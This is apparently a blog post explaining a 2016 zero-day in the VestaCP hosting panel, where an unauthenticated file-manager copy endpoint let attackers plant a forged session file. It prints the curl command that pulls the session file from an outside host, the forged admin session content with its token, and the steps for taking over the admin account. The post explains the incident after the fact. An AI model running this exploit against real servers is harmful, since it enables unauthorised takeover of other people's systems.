VestaCP hack explained

A few weeks ago the Vesta team released a new version because of a 0day security bug. I think after a few weeks it’s time, to tell the truth about the security bug. On 7 April 2016, I found hack activity on one of my servers. I also received the security report of the hacker to tell me how he has done it. I instantly send this bug to the Vesta team.

The paid file manager option that was introduced in vestaCP at the end of 2015 had a bug that didn’t check the parameters. The script /file_manager/files.php allows unauthenticated users to copy files using the PHP function copy(). This function supports remote URLs and is used to copy files. It was possible to upload a manipulated session cookie.

curl -kv "https://apitest.io:8083/file_manager/files.php?action=copy&source=http://somedomain.com/vestacp.sess&dest=/tmp/sess_test123test456"

The content of file vestacp.sess is the following::

WEB_SYSTEM|s:7:"apache2";WEB_RGROUPS|s:8:"www-data";WEB_PORT|s:4:"8080";WEB_SSL_PORT|s:4:"8443";WEB_SSL|s:7:"mod_ssl";PROXY_SYSTEM|s:5:"nginx";PROXY_PORT|s:2:"80";PROXY_SSL_PORT|s:3:"443";STATS_SYSTEM|s:17:"webalizer,awstats";CRON_SYSTEM|s:4:"cron";BACKUP_SYSTEM|s:5:"local";LANGUAGE|s:2:"en";VERSION|s:5:"0.9.8";DB_SYSTEM|s:5:"mysql";language|s:2:"en";user|s:5:"admin";back|s:11:"/list/user/";token|s:33:"149807660357063a00ab85e0.81076891";

Exploit

Now, an attacker can simply access the administrative interface with a cookie of name “PHPSESSID” and value “test123test456”. As you can see in the vestacp.sess file the user was the admin, and there was an existing token. Whit this info an attacker was able to login to the admin account and with the token he can send a POST request to update the user information. Because the hacker who hacked a lot of Vesta servers created a script to automate this, he changed all the details of the admin user. The password, email, names, shell, …

From my calculation and check, there were around 1000 servers which were hacked.


Leave a Reply

Your email address will not be published. Required fields are marked *